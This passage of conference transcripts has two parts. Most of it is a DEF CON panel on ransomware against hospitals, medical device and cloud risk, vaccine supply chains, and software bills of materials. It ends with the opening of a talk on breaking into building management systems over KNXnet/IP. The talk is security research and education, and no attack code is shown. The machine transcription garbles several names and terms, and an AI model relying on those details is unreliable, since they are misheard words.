knew a bunch of seams and cracks in the US ability to provide medical care. We knew many of them. We flagged several. Some got started like the S-bomb work and other good reforms. But the pandemic just took all those seams and cracks and really just overstressed and strained and sprained and broke many more. So we were hoping that ransom crews would realize they too live in the world and they too would be a victim to degraded and delayed patient care. But instead as we feared there was an elevated volume and variety of deliberate disruption to healthcare delivery, nursing homes, PPEs, ventilator supply chains early in the pandemic. Building on some of the great things said prior people did have to stand up spaghetti monsters. I love that phrase. I had a necessity to do their jobs or to respond to the various stages of the pandemic. So they had their old attack surface and now a new one often using unsupported technologies that couldn't be patched in an emergency even if they wanted to. And worse because a lot of elective surgeries that are the top revenue generators for a lot of these institutions couldn't happen. People were laying off and furloughing IT staff and IT security staff last summer. And while they did somehow claw back some of that tech debt, we know from that same task force that our estimate at the time was 85% of the hospitals in the US don't have a single cybersecurity person on staff. So we're often giving cyber hygiene advice and do implement zero trust platitudes or implement multi factor authentication when they don't have any money. So the degree to which a lot of these healthcare institutions were what I now call target rich and cyber poor living below Wendy Nathan's security poverty line really has gotten worse during the pandemic as well. So don't want to be all doom and gloom, but the effects are pretty severe. And some of the analysis that we had a, I don't know the final count of CARES Act hires, we hired data scientists infectious disease specialists, physicians like Dr. Ruben Pasternak that I know you two work with. And through this fusion center, we started looking at what are the impacts of the pandemic and the ransoms on the nation's ability to provide medical care. We track 55 things called national critical functions, NCFs. These are the things that affect national security, national economic security and national health and public safety. The one that's been in the red zone and the purple zone for the most, the pandemic is called provide medical care. And this is what two of you do professionally every day. We looked at severe strains throughout the pandemic initially noticing a new problem because the pandemic, which was cascading failures. So it used to be that if you had a ransom or an outage or some power problem, you would merely divert ambulances the next nearby facility. And that's kind of predicated on the next nearby facility being able to receive anybody. So when everyone's at a saturated level or in the red zone themselves, a failure in any single hospitals tended to have cascading stressors or failovers in nearby facilities. So Christian, I heard in your amazing testimony to House Energy and Commerce, similar sentiments. So we started studying that as well. Then we started looking at something very poorly covered in the media, but the CDC tracks something really important every year, every month called excess deaths. And this is the difference between expected deaths and actual deaths by condition by month by state and at the national level. And when the US hit that February milestone of 500,000 lost Americans to COVID, we also hit a different milestone of 150,000 lost Americans to non COVID conditions that are otherwise treatable, very treatable. The number one aid demographic of that was 25 to 44 year olds. The young folks that could have been saved, but for excessive loads on our healthcare delivery across the country. So these are things like time sensitive things like heart attacks, strokes, cancer, where time matters, minutes matter, hours matter, days or weeks. So Christian and others on this panel in the past, we often cite the New England Journal of Medicine article that says 4.4 minutes during a marathon can be the difference between life and death and increased mortality rates for heart attacks. We know with strokes, the difference in life and death could be one, three or four hours. So what did four weeks of interruption in the state of Vermont do with the UVM Medical Center and 118 facilities in upstate New York for Montt and New Hampshire. So again, where minutes matter, we know that delayed integrated patient care effects outcomes, including mortality rates. We were deeply concerned about this and almost done some of these truth bombs. But when we looked with data scientists for the first time, this fusion center, we started to say is there a relationship between capacity levels and mortality rates and for excess deaths. And we're starting to share this with the public data, but without getting into the inflection points, we did see a strong and positive correlation between something like ICU bed count and excess mortality, excess deaths to four and six weeks later. So we got a kind of a leading indicator that we could tell if a hospital or region, a state was going to incur excess deaths, if they were starting to reach too high of a capacity level and then ask the really tough question. And I think, do you know harm cares about, which is, can cyber disruption precipitate or accelerate or cause that harm to worsen? And of course, we know a fire is hot and water is wet. So of course, any degraded and delayed patient care from any source can do this. But we did start asking uncomfortable questions and look at the state's hardest hit by that concerted effort to disrupt healthcare during the month of October and November. And adjusting for all the rare, all other variables in a state like Vermont, it was very clear that electronically disrupted hospitals achieved that excess death red zone much faster than their peer group. So again, if minutes and hours of the difference in life and death, and you're in a geography that can't get to the next nearby facility. We should stop asking, can cyber attacks lead to loss of life? We've answered the question. There's enough statistical evidence now to show this. And some of these will be easier and smaller inflection points post pandemic when we can go back to fuller capacity and slack in the system. But some of the system dynamic revealed shows that if you don't have next best alternative proximal care within a certain radius, then that cyber disruption will cause adverse events to patient care. So it's really pleased to see your testimony Christian say very similar things, but you know, it's a somber set of recognitions, but we can at least move past debating if there's an impact from a lack of cyber resilience and now start talking about what the hell do we do about it. And we want to make sure that we link arms with CDC and HHS and FDA and others as we go back to Congress and leaders post pandemic because we have a lot of work to do. And many of these can't institute multimillion dollar cybersecurity measures. So what is to be done? I think part of the answer is going to come from the creativity of the hacker community here. There's a lot to get back to there. Yeah, so we're going to we're going to circle back to a number of points there, but I wanted to ask that, you know, in the spirit of this theme of what have you seen or what have you learned over this period, you're a cloud security expert. Have you seen different organizations, whether healthcare or non health care attempt to address in the technical debt by by moving a lot of operations to the cloud? And then what do you sort of foresee as the implications of that with respect to the attack surface and how we're thinking about these problems like ransomware, another focus attacks. Yeah, so there was a huge terrible I think kind of near the beginning of the pandemic where a lot of companies to where one of them is with the cloud, and it's only gotten, I guess, bigger, the movement's only gotten bigger. It's kind of accelerated that move for a lot of companies that were planning it. It does increase the surface, because people don't understand the cloud environment completely sometimes. I think there's a lot of education to be had between, you know, in the relationship between the cloud provider and what their responsibility is versus what your responsibility is as the person who is putting data in the cloud, and that's where we see a lot of the breakdowns is not understanding that it's the customer responsibility to secure the data and not the cloud service provider. They're just securing the platform that the data is on. So things like that, I think are going to continue to be a problem. I know we're seeing a lot more big breaches as far as cloud environments go. So just even open buckets on the internet, low hanging fruit, stuff like that. So yeah, I think it's going to continue to get worse before it gets better. And Jessica, I'm interested to hear a little bit about how you and FDA at large have sort of changed your thinking a little bit, because we have sort of moved from this conception of the importance of individual vulnerabilities and contained devices, which is still, you know, obviously very important. But now everything living in an ecosystem, understanding some of the effects of just the degraded infrastructure and how that can adversely affect patient care. I mean, FDA is obviously focused on patient safety, medical devices are your purview, but how do you start thinking about things like ransomware within that context, combining it into a situation where you may have medical devices that are supported by cloud infrastructure and in sort of how that branches to include the entire ecosystem and not just an individual device or an individual patient. Yeah, so I'm actually going to follow up on this originate, I had already unmuted in everything of GABS point on the, you know, sort of the rush to the cloud and what that means and the different responsibilities that the different parties have. And to sort of synthesize the follow up I had to that and then the questions you asked for FDA, there are medical devices, right? You can pick up something and it is a medical device. There are also medical devices that are systems and it's, you know, that you may have the device that will actually deliver the care, but the calculations as to how much of a dose to give a patient or how long for the medical device to run or whatever else it may be. That's taking place somewhere else. That's taking place on a different computer. That's taking place in the cloud. That's taking place, whatever. So for us, for the FDA, that whole thing is the medical device. The medical device is the thing. The medical device is also the entire system that is necessary to deliver the care. And we saw this happen earlier this year. This was one of the first times, at least, that we've had it confirmed and really hit the news where a disruption in the cloud service availability of a medical device manufacturer led to the unavailability of care for patients for an extended period of time. And the devices themselves were fine. There was nothing wrong with the devices. The devices weren't ransomware. There was no malware on the devices. They worked perfectly well. The calculations to figure out how much the treatment that the patient needed happened in the cloud. So because the cloud wasn't available, the devices didn't work. And so for us, one, this was a little bit of, not a new thing. Like we had always conceptualized that this could be a problem that we were going to have to deal with. But it really, it took a little bit of a perspective switch to go from, oh, we have to look at whether or not the device itself is being hacked, whatever you want to, you know, whatever hacked means, whether or not there's malware or ransomware or whatever else is on the device to maybe the system is just unavailable because the system is multiple parts spread over multiple locations and one of those locations is not available. And so for us, and now for a lot of the medical device manufacturers that we work with, this is something that we're asking them about. We're simply saying, what is your plan? Really do you have one is the implied question there? And sometimes that that's not even, the answer to that is not always yes. What is your plan for if the cloud or for remote service or if the connectivity goes away? Can you still deliver care? And so that's been an interesting perspective in paradigm shift or maturity or evolution if you want to follow that. Can I add on to that? So the other kind of thinking from the healthcare provider space that the interesting impact I saw from this increased adoption of the cloud was sort of pre pandemic. It was really common that when you went to a hospital and you had a medical device that had a cloud component, one of the early questions that would happen is, is there an on prem version of this? So hospitals were really uncomfortable with systems, medical devices that had the ability for under normal use to send patient information outside of their hospital. So hospitals really wanted that on prem solution. So manufacturers had a lot of pressure that they wanted to innovate with the cloud, but there was that demand for on prem solution. And so I saw a real opening up of that risk tolerance from the hospital space where now towards we get halfway through this pandemic, that doesn't start to be the start of the conversation. The hospitals are now just assuming that there's an off prem component to these systems. They're doing their cyber due diligence, right? They're asking the right questions about those components, but that acceptance of a system that is not just on prem has increased dramatically. And so that's been a very interesting change without adoption is that there was kind of a force acceptance for hospitals update their risk tolerance for systems that weren't just on prem. Those are all great insights and I will say just being adjacent to this space, I would confirm all of that and also that the conversations evolving, not just to let's not have an on prem solution, we're okay with the cloud solution or remote solution, but that that could potentially be an answer for some of their internal cybersecurity concerns, meaning as Jeff or as Josh mentioned, the task force reported that nearly 85% of hospitals in estimation lacked a full time security professional. And so this is not a problem that is being solved very quickly. And so they're left with this question, it's almost like a selling point from some manufacturers to say, well, we have a cloud solution in which we can secure this data better than you could potentially do at your own institution. Therefore, it's almost being seen as like a security upsell. And I will say that this is also very commonly cited as a reason to go to cloud hosting for the electronic health record, you know, as we talk about the ecosystem of healthcare, so much technology required to take care of patients. One of the most important elements of that's of medical devices, but another really important part of that is the electronic health record. And I jokingly call it the operating system of healthcare, you can't do anything in a hospital without the electronic health record, you can't admit a patient, you can't order drugs or treatments or test results, you can't even review that notes without the electronic health record as we see now a push to really host all of that content in cloud services, usually by electronic health record vendors. And it is part of their selling process to say this is more secure. In fact, they cite it as a reason for why you should invest in it, because if your hospital is ransomed, then you can still access your electronic health records through some web portal and no one's ever talking about that consolidation of services into one focal point that if attacked and ransom, for example, would lead to the failure of electronic health record not for one hospital or five hospitals, but for hundreds or potentially thousands of institutions across the country at once. And that's not anything anyone's talking about. So thank you all for bringing that to light. My question. Well, can I have it? Christian, can I just really quickly, there's another thing that really gets me about this. And I think that we saw this with some of the ransomware talks on hospitals today, like to the point of like, oh, like just put your electronic health record in the cloud, then if you get ransomware, you can still access it. On what computer, on what device am I going to pull up my personal phone and be like, hold on, I need to pull up your personal medical record. What are you okay? It's fine. It's fine. I'm like, that doesn't make any sense. Yeah. All the endpoints are owned. They're all ransomed. And it's funny because one of the common backup strategies employed by hospitals is actually to have what they call a cold storage workstation. So at a lot of hospitals that are well resourced, these are not a lot of hospitals still don't even have this. They plan for a downtime of their electronic health record, like a fiber line gets cut or they lose access to the data center or whatever it's going to be. There are computers that are supposed to be in most areas that are a day late in their medical records, meaning that they are hosted somewhat locally. They still have connectivity, but they are thought to be, you'll have at least last yesterday's electronic health record data. And that's what people are citing as a potential mitigation to lack of availability of medical records. So those are the same endpoints that get owned and ransomed. Your backup solution doesn't anticipate that. So what I'm trying to get at here is that a lot of hospitals, healthcare delivery organizations, prepare for technical downtime in the context of the power goes out, a fiber line gets cut, a patch goes awry, and they're down for three, five, eight hours, 24 hours at the most. And guess what? You can use all these other systems. There's not a plan for technical failure of a catastrophic nature such as ransomware, wherein there are no endpoints you can trust or they all might be ransom that your current technical backups simply will not work. So great insight, everyone. And I really appreciate all that. Anything else before we move on to the next question on this? So one of the things we had talked about, there's a lot that happened during the pandemic. One of the things that I'm so happy, I'm an ER doc. So one of the things that really brought tears to my eyes thinking about was just how quickly we got vaccines out, right? That amazing feat, which was the science, the development of the vaccine, the research, the data collection, the statistics, and then the subsequent production of it is a miracle, you know, an honest, amazing thing that happened. We had heard of attacks on the vaccine pipeline development, you know, is, to my knowledge, none of that impacted the time at which we got the vaccine, but we can imagine in the future, you know, how many other vulnerable parts of healthcare we have. We have hospitals, the medical devices, but we have a whole medical research world. We have the vaccine development world. Can everyone kind of reflect a little bit about how the pipeline in which we bring any drugs out, new vaccines itself is very vulnerable to these types of things, and we should be talking more about it. And what do we do about it? Because clearly, there was already a failure during one of our humanities, you know, arguably most important points. Maybe I'll start the answer and others can fill it in without getting into, you know, sensitive names. Many of you heard at least about Operation Warp Speed where we gave money to accelerate the development and distribution of vaccines for the first time in our species on coronaviruses. We weren't even sure it would work. So we had backup plans for therapeutics and diagnostics. But there were various stages of that relay race with different accidents and adversaries with different manifestations of harm. And it was pretty precarious and it's not as obvious as just do world-class cybersecurity. So the stages we looked at where the first stage was really R&D and clinical trials, when it was fill and finish and scale production and fill and finish, then it was cold chain, cold storage distribution all the way through administration. In the first stage, it was a lot of espionage, you know, like can we find out who's working on what and steal the recipes or intellectual property. In the second stage, you started to see more financially motivated criminals that wanted to profit off disruption or ransoms or DDoS or other forms of extortion. And the last stage, Murphy was really the top adversary of just logistical confusion and working between the federal level and the state level. But yeah, we in record time created effective vaccines and made enough of them for most people to get it. The weak link in the whole chain without changing topics is that while we beat biology faster than bureaucracy, it was really tough to figure out who owns, you know, combating MISTIS and malinformation and information operations that sowed a lot of vaccine hesitancy across a number of categories and a number of demographics. So while we were racing to develop cures to achieve herd immunity and protect the American interest and the global interest, the weak link in the chain seemed to be fighting misperceptions or misinformation sufficiently to get enough of this adoption. So we're not yet done the pandemic work, but I think each of those revealed that once you got past the really big R&D, the real challenge is that target rich cyber poor because some of these very rare manufacturers had three IT people, zero security people and no security budget, you could sneeze on them and they would probably lead to the death of a lot of people. So we had a really harrowing job of identifying, engaging, informing, trying to protect them while there was a lot of people throwing Molotov cocktails around. So a lot of successful attacks, but hopefully not successful delay to what you've now seen produced. But it shatters your assumptions that people are doing good cybersecurity. A lot of these players are brand new and haven't yet matured to the point where they can be resilient against even a script kitty. I agree that misinformation is basically one of the worst weak points, but I did spend the majority of the pandemic kind of on the other side of the vaccine table. I was involved in one of the vaccine manufacturers studies in a genetic consultant capacity. So my main concern as the study kind of progressed was the amount of information that was going to so many places and we didn't know what that place's security looked like. So I mean, the study I worked on had thousands of research sites that we were trying to recruit people at and each one of those research sites has their own security and we've got the entire information about the vaccine going to these sites, hundreds of pages of information about the structure and the function and things like that. And it made me really nervous because you don't know what their security looks like. You don't know if they're printing it out and tossing them in the street or leaving USB drives with that stuff on it everywhere. And I think the information control is another one of our weak links that we might need to start to address in the future. Yes, I mean, it's interesting. I think those are those points really well. You know, the wild variation in capability between everyone all along the supply chain, but I almost go the opposite direction. My concern is that everyone is the same in that everybody is using the same hardware and everybody is using the same operating systems and everybody is using the same software and hardware because what we're seeing or what we've experienced is when we get vulnerabilities that pop up in Windows or in whatever it is, shared operating systems, shared applications, you've got SolarWinds, you've got Cassay, you've got the set and the other thing. We were all seeing how interconnected everybody is in relying on the same software and hardware. Everybody within the supply chain is immediately hit. The medical device manufacturers, the pharma companies, the HVOs, the federal government were all suddenly experiencing the same problem at the same time. And that obviously creates a huge problem of are we all prepared to respond to it? If we're not prepared to respond to it, what do we do? And I don't think it's a secret that there's a wild variation even in the federal government in terms of, one, the agencies themselves being able to secure themselves, but different sectors being more or less involved in the cybersecurity of their sectors. So obviously here I am, FDA has been very forward leaning in medical device cybersecurity for a long time. But some other sectors are really just starting to begin their cybersecurity journey of working with their sectors in trying to recognize that everything is digital. All manufacturing lines are digital. Nobody's hand making much of anything anymore these days. You've got robots making everything. So if something goes down on the manufacturing line, the product is affected. The manufacturing line is affected. The supply chain downstream is affected. And so the intricate and really delicate nature of all of our supply chain cybersecurity perspective I think is really fascinating and also very frightening. My goodness, that perfectly segues into our next question, which I'll first to start with Stephanie. And then we'll love to get everyone's opinion on this because it seems to be, to me, a very uncontroversial topic, but has become increasingly controversial. I don't understand why. The concept of software bill of materials, this thought that to combat these types of supply chain concerns, we need increasing transparency about what constitutes the software and hardware that we use insofar as being able to identify when a vulnerability is found, what devices and what software will be vulnerable to that. So there's this concept of software bill of materials, a nutrition label if you will, what components are within a particular device or software suite itself. Clearly seems to be compelling argument in medical devices for, for exactly what you've mentioned. Can everyone here quickly just reflect upon why, you know, what about software bill materials, how will that address these concerns if it will, and how do we operationalize that because that seems to be a big focal point of some of the criticism. Perhaps start with Stephanie. So it's an interesting one to bring up because it's, like you said, it's a very polarizing topic when you talk to people and I'm in the camp that the software bill materials is actually a really good thing. But playing the devil's advocate, when I do hear people kind of take a more, a harder stand against the software bill materials, they're always citing things like, is that not just giving up a blueprint basically to my device to the bad guys. I'm of the mindset that, no, the bad guys can figure that stuff out anyway, but that is one of the common criticisms I hear about it. It's been interesting watching the last couple months of, I think, a big sort of force multiplier in the space is the most recent executive order. I think it was May 15th that really just accelerated this idea of software bill materials. And so I've seen a big shift from the thinking of, should we do it? Should we not do it? And more to, okay, how do we do it? Well, on the surface sounds like a really simple thing, but actually when you get down into how do you make one, how do you do it consistently? How does everyone speak the same language? But then more importantly, how do you actually use it to your point, Christian? How do you operationalize and get value from it? There are so many TBDs in that life cycle that it becomes really interesting conversation, but I think that most recent executive order has actually, I think, taken some of those naysayers and said, okay, well, you can still be a naysayer, but this is happening. So that's been good. The other piece I see as a kind of resistance to the idea of it, and again, the executive order kind of dwarfs all of this, but this idea that it's almost fixating on the wrong piece of the puzzle. In a lot of regards, the reason you want finished product software bill materials is so that if you were a user or a consumer of that device and there's a new vulnerability and some commodity operating system to Jessica's point, you don't have to wait to hear from the manufacturer. You can kind of do your own due diligence and threat management to say, oh, wait, I have 10 things that are affected by that. So the criticism I've heard is that the bigger underlying issue is that there is a struggle right now to basically rely on the manufacturer to give you timely communications and that if the manufacturer was actually giving you timely communications, you shouldn't be the one having to do that level of threat management. You shouldn't need the software bill of materials because you should be able to rely on getting timely and accurate information from the manufacturer. So I sort of agree with what those criticisms are pointing at, that maybe the answer is more of how do we make that timeline more succinct, but I think the software bill of materials is a good place to start as kind of a common stakeholder. And let's try to solve this together. And yes, it would be great to get to the point where you don't have to manage software bills of materials because manufacturers are actively telling you the risk, but we're not there yet. Well, I think the other thing is, and so I'm going to reveal my absolute adoration for us on here very quickly. But for a lot of the users that I work with on a daily basis, it's with the healthcare delivery organizations themselves, so the actual hospitals, the chief information security officers, the chief information officers at these places, they want this information. The manufacturers have actually tried to be like, no, no, no, no, no, don't worry, we'll just do it for you. It's not going to be fine on us, it's going to be fine. And they're like, no, you will give us this information because, well, and so let me, let me back up. So I love software bill of materials. I think it's fantastic. I actually am glad I got to speak before Josh because I think otherwise he would have stolen my line, which is that you can't protect what you don't know you have. And that's the whole thing about what software bill of materials is about. If I don't know what I'm running because software is not, you know, nobody is, you know, going up to this, you know, this big chunk of, of Marvel software and like chiseling out a new program. That's not how you make software these days. You build software out of other little pieces of software. And if you don't know what the other little pieces of software are, then when there's a problem with it, you have no idea what's going on. You're like, well, the device is freaking out. Don't know why. It could be one of the 50 components that this thing is made out of. So software bill of materials helps you address that problem. Is it a perfect solution? No. Is it a start? Yes. And the interesting thing for us, so like the FDA is going to require, it's in guidance. Guidance is in voluntary. I can say, something's laughing because this is like, we won't go here, but guidance is voluntary, but it's guidance and it's in guidance. The medical device manufacturers have to have, it's cyber security bill of materials now, but it's the same thing as software bill of materials. But for us in the executive, you know, we're going to require it. The executive order says they'll shout through it for certain situations, but for us, that's not even what it's about anymore. It's getting into contract language. Household delivery organizations are essentially going to medical device manufacturers and saying, we're putting in that you must give us software bill of materials in our contract. Therefore, if you don't, one, we're not going to buy your product. And two, if you don't do it, it's breached with contracts. So like, forget what the government says. Your customers are now like, yeah, we're, you got to fork it over. So for me, it's, you know, it's been kind of fun and a little bit funny to watch a lot of the debate that's going on with software bill of materials to Stephanie's point about like, oh, like, should we do this or should we not do this? I'm like, well, I really don't think that's the question anymore. Like either because your contract says you must or because a bunch of federal agencies say you must, like, you're going to have to do this. So my recommendation to the extent that anybody is asking me, seize your own destiny, become very good at software bill of materials very fast because you're going to have to do it one way or the other. I mean, we don't, we could easily have an entire panel on SBOM. So I won't repeat most of those. But you know, some of these common, there are a bunch of common, sometimes often good faith concerns about it. Many of them have fantastic answers at NTA.gov slash SBOM. There's an FAQ. There's a myth busting type set of resources. And some of them are, you know, genuine concerns like, won't this be a, you know, road map to the attacker? And we have a phenomenal answer about why it's more often a road map to the defender. And you know, people keep saying that hospitals could never use this and it's going to, it's going to be work they can't afford and they're on camera and on record begging for it. So I think we should, for people who hate FUD, we should stop pervading it. If you have questions, there's usually great answers to them and they're usually documented. And then to the executive order, maybe to pivot to the end of this part. You know, what do we care about as hacker community? What are our values? Because I love that the executive order started with a value statement. My favorite sentence is, in the end, the trust we place in our digital infrastructure should be proportional to how trustworthy and transparent that infrastructure is. And to the consequences, we will incur if that trust is misplaced. So this doesn't say that ingredients list on food stops health problems or junk food. It doesn't stop anything, but it's part of a regime of transparency and trustworthiness. And for those who say software bill materials isn't proven yet until we have 10 years of study, this is a practice stolen from Deming in the 40s for automotive then went into every manufacturing. Now it's in chemicals and food. Bombs are proven. It's about time we embrace them. So software bomb isn't going to be identical. The growing pains are really going to come from that we have a lot of technical debt and people are afraid to reveal their technical debt. But as we start identifying and paying down some of that technical debt, we're going to wonder why we never had these before. These are all fantastic things. I'll also just say, one of the biggest concerns we have now with common talking points around healthcare cybersecurity is this concern for legacy devices and how looking back, we don't know what vulnerabilities exist. We don't even have a good understanding or visibility in that. Well, guess what, today's cutting edge medical devices are the legacy devices in five years. And so getting ahead or five or 10 or so, so Josh, look up towards there. At some point, the current generation medical devices will become legacy devices and knowing what's under their hood will help us in the future. We have to start that now. I wish we had started it 20 years ago and a lot of the concerns around legacy medical devices and what's vulnerable, what isn't, and what we can worry about that lead to some of the most harrowing stories about cybersecurity vulnerabilities and medical devices would have been alleviated to some degree by software bill materials if we had done it sooner. So, you know, really an important thing for us to get started sooner rather than later because the return on investment only gets better as these devices age. And so great. Anything else on software bill materials before Jeff takes us to our next question? Yeah, and I think we're actually running up against the hour here. So this will probably be the final question. I think just by the nature of how complex this entire topic is, we can kind of easily trend towards some of the more inside baseball aspects of this. So I think it's really important that we've hit on things like Sbomb. But I do kind of want to bring it back as we close to this idea, Christian, that you and I and the others who started this kind of brought to the table, which was we want somewhere that the average DEF CON attendee can come and learn about healthcare, security, how they can get involved. And so I kind of want to say we do a lot of admiring the problem. Things like Sbombs are definitely steps in the right direction towards solutions. But for the average person with no real background in this, I kind of want to understand how the panel thinks that they may be able to help out because we actually do need everybody and anybody who's willing to contribute to these issues. And so I want to break this into kind of two groups of people to ask the question. And first, I want to start with Gabb, who has, you know, one of the most interesting career arcs with respect to all of the spaces she's been in and how her journey has taken her and ended up at this point, what her advice would be to somebody who's maybe insecurity, maybe like hacking, how they can kind of combine interests and the desire to help with healthcare. And then sort of move through Stephanie, but then end up with, with Josh and Jessica, you know, not everybody is going to be able to testify before Congress on some of these issues, not everybody is going to be at some of these high level discussions. But how can the average hacker get involved in the policy mechanisms? How can they contribute to some of these initiatives and what your advice would be? So long question there, but let's start with Gabb say like somebody shows up at, you know, Harmon Person in Vegas and says, Hey, this is awesome. How can I get involved? What's your advice for me? Yeah. So I was thinking back to, because it was only a couple of years ago that I actually made the career switch and just trying to think like, well, what would I tell my former self to do? And a lot of it was just, I guess, be a little bit more proactive as to the research I was doing and trying to understand the entire, the big picture. It's not just the software of the device or the hardware of the device. It also plays into how it's used that threat landscape. And even the policy side of things, the just knowing, you know, what parameters it has to adhere to, what, what specifications it's supposed to meet, things like that. I think we're really helpful in kind of understanding that entire big picture of medical device research and just getting your hands on as much information as possible. Awesome. And so I'd follow that with, you know, if you're in the security space and you're looking at the medical device space and thinking to yourself like, I would just love to make an impact here, right? So there's, I think, one of the biggest ways for security people in the space to make an impact. I mean, you know, one, you know, help medical device manufacturers, you know, work for them. They all have open job rights. But if you're, if you're trying to just say, you know, how can I, how can I come in and make an impact in this space? I think one of the really underserved areas I always see is standards and regulatory working groups. And I'll be the first to say it's not sexy. It's a boring, a lot. It's super boring. You know, you're not through hours listening to arguments about where commas should be placed. But at the end of the day, those standards and those regulations that are coming out are guiding the future of the industry. And they absolutely need subject matter experts in security to sit and sit through those arguments about where commas should be so that at the end of the day, the technology recommendations, the technology requirements inside of those guidance documents are actually ones that align with the unique needs of the medical device space and actually meet industry and security best practices. So it is not sexy. I will tell you, it is boring. But if you were sitting there thinking, I have a lot of security knowledge and I want to make a big impact in the healthcare space, absolutely join working groups, absolutely join standards and regulatory groups that are trying to push the industry forward. That is a huge area that you can have an impact. Roshan, about you. I would say great answers. I do think the quote she was trying to prompt me with earlier is that I often say to policymakers through our over dependence on undependable things, we've created the conditions such that the actions of any accident or adversary can have a profound impact on public safety, national security, something along those lines. So it is really about the relationship between how dependent we are and how dependable those things are. So pivoting off that great recommendation that a ton of these medical device makers are hiring. Some of these hackers are not reporting to them, they are working for them, large and growing teams. There are 10,000 medical device makers creating the next wave of medical breakthroughs and only about 100 of them are large, the rest of them are tiny. So they really do need help and advice and scalable ways to do threat modeling or build less brittle devices. The hospitals need a ton of help too and they just don't have the resources. So I'm getting the point where I'm getting really disgusted with the notion of they should just do zero trust or they should just do MFA and they should just do best practices. They just can't do just those things. So at least one of the ways I'd like to embrace the talent pool here at DEF CON is I pushed really hard for a few new things and the life software and support and service of national critical functions is dangerous. And that is especially dangerous when it's exposed to the internet. The use of hard coded default maintenance passwords exposed on the internet. This will be happy to hear this, but we have a document coming out to get your stuff off search. So if you're exposed on something like showdown or census IO or the other tools to find connected devices, you know, we want to start becoming more practical and pragmatic so that without huge budgets right now, we can at least remove some of the most egregious elective attack surface in our brand new director directories release. So things we do, but we have to meet people where they are. On board. I don't know that help. But you know, I don't think I've said this yet before I worked at FBA. I worked for the Congress. I worked for the energy and commerce committee. And I was the tech English dictionary. I was like the walking tech English dictionary when people were like, we don't know what these words mean. We don't know what this concept is. I'm like, I'm not going to explain this. And that was my job. And Congress needs that a lot. So for those of you who are like, maybe it would be interesting to get involved in the federal government one, FBA always needs people. We, you know, if you like the idea of pulling apart medical devices and getting to determine whether or not they're secure and stuff, come be a reviewer, come apply to be a reviewer at FBA and get to determine whether or not a medical device gets to go into the market because it has good or bad cyber security. But you can also go to Congress. There's something called techcongress.io. They bring in, somewhere I think between like 10 and 20 fellows every year and place them in congressional offices. You become that offices technical experts. And people have gone on to like do great things from the tech congress fellowship and they've, you know, a lot of them have stayed in Congress. They've done, you know, they've done just a lot of just amazing work. And so if you think policy is something that you want to do, pick your agency, pick your agency and go pick your branch of government and go. We need all the help that we can get. So, you know, throw in, we're ready to, we're ready. Well, thank you again to all of our panelists for joining. I wish we had three or four hours to talk about all the stuff at which point. I'm sure all of you guys would hate me if we kept you here for this long. This is just one of many conversations we've had. If you're interested more in this, there are all of our prior do no harm panels that have been recorded are available on the DEF CON YouTube channel. And then for those of you who are going to be in person at DEF CON vaccinated and masked, we'll be having a live in person do no harm this DEF CON as well. And with that, we want to say thank you to all of our panelists. Jeff and I are going to clap for you guys. Come on, you got this. Thank you so much. We love you all. And you all are brilliant. We love you all of you every time we speak with you. Stay safe. Stay distanced. Stay masked and get vaccinated if you can. And with that, do no harms. Another one in the bag. Thank you, everybody. Take care. One last final shout out. We can't end this without giving mad props to the Black and Village. And it's a little bit anachronistic because I think it'll be over by the time that you're listening to this video, but anybody else who wants any other resources or inspiration or just an incredible experience at that to your future DEF CON plans because they're incredible. Thanks, everybody. Really appreciate it. Stay safe.
|
Mired in the hell of a global pandemic, hospital capacity stressed to its limit, doctors and nurses overworked and exhausted... surely the baddies would cut us a little slack and leave little 'ol healthcare alone for a bit, right? Well, raise your hand if you saw this one coming. Another year of rampaging ransomware, of pwned patient care- only this time backdropped by the raging dumpster fire that is COVID. Can we once and for all dispel with the Pollyannas telling us that nobody would knowingly seek to harm patients? And if we can't convince the powers that be- whether in the hospital C-suite or in DC- that we need to take this $%& seriously now, then what hope do we have for pushing patient safety to the forefront when things return to some semblance of normal? With a heavily curated panel including policy badasses, elite hackers, and seasoned clinicians - D0 N0 H4RM remains the preeminent forum where insight from experts collide with the ingenuity and imagination of the DEF CON grassroots to inspire activism and collaboration stretching far beyond closing ceremonies. Moderated by physician hackers quaddi and r3plicant, this perennially packed event always fills up fast - so make sure you join us. As always- the most important voice is yours.
|
10.5446/54200 (DOI)
|
Hi, I'm Clave Acheaut and today I'm going to talk about sneaking into buildings using the Building Management System protocol KNXNET IP. First, a little bit about myself. I started as a software developer, then moved to software security and then to embedded and industrial devices and system security. Also in my job I like penetration tests on unusual environments and by unusual environments I mean for instance factories, transportation systems, amusement parks and so on. During these assessments we often have new environments with non-devices and protocols and we usually don't know where to start. This is what happened for me with Building Management System and KNXNET IP. Just before we start, a little disclaimer. Building industrial systems and Building Management Systems can be dangerous. They control physical process so they may have an impact on people's safety, causing accidents or disabling outlets. So please be careful. So during our assessments we usually test on mock environments or at least environment we control to avoid a non-deficient effect. Now that said, let's talk about Building Management Systems. You may have already heard of them as this is really not the first talk about Building Management Systems but I don't feel it's yet the time to stop introducing them first so here we go. Building Management Systems or Building Automation Systems are systems that can control every component in a facility from lighting to security systems including HVAC, sometimes elevators and so on. As their name suggests they are used to automate these components and to control them easily and you can find them in all types of facilities like homes, factories, hospitals and so on. So here is an interesting example from the movie Hackers which has a BMS hacking scene. The main character hacks into a school BMS interface and he schedules a sprinkler system to run at a certain time basically for revenge. And this is what happens. So I don't know how it was back in 1995 but now apart from this weird 3D interface this is quite a workable scenario. We can definitely do this provided of course that the sprinkler system is linked to the Building Management System. So now let's take a closer look at this technically. In BMS the main part is the field part where the actual components are. We often find three types of components sensors, actuators and controllers. If we take the example from Hackers sensor could be a fire detector, the actuators could be the sprinklers and so on. So they communicate, these devices communicate with each other using field bus protocols usually on twisted pairs or radio frequencies. So this part can work standalone and in fact before it was the only part. But then the field part got connected to the IP network first because there was that train to connect everything but also most probably so that operators could reach and control them more easily. So basically there are additional devices that will call IP interfaces or gateways or server or whatever and this IP interfaces makes a translation between the IP world and the field world. So to simplify the operator just needs to be on the same network as this IP interface to configure and control the field part. In a way we expose components that used to be only reachable physically to anyone on the network or even the internet. And that's interesting for us and we may definitely want to take a look at it from a security point of view. So in industrial and building management system many software and protocol were created before we started talking about cybersecurity or they were created without considering that they may be exposed someday and they are usually meant to last for a long time. So some of them do cover safety measures which are prevention against involuntary failures but they don't cover security issues. They don't cover provoked error for instance they don't prevent from forging or replaying packets. And it's also quite common to find configuration flows on them such as default credentials or only one user which is used to run everything on a device and its route and so on. So see there's a lot of things to think about when it comes to industrial systems and building management system security. But there's more. Let's take an even closer look at 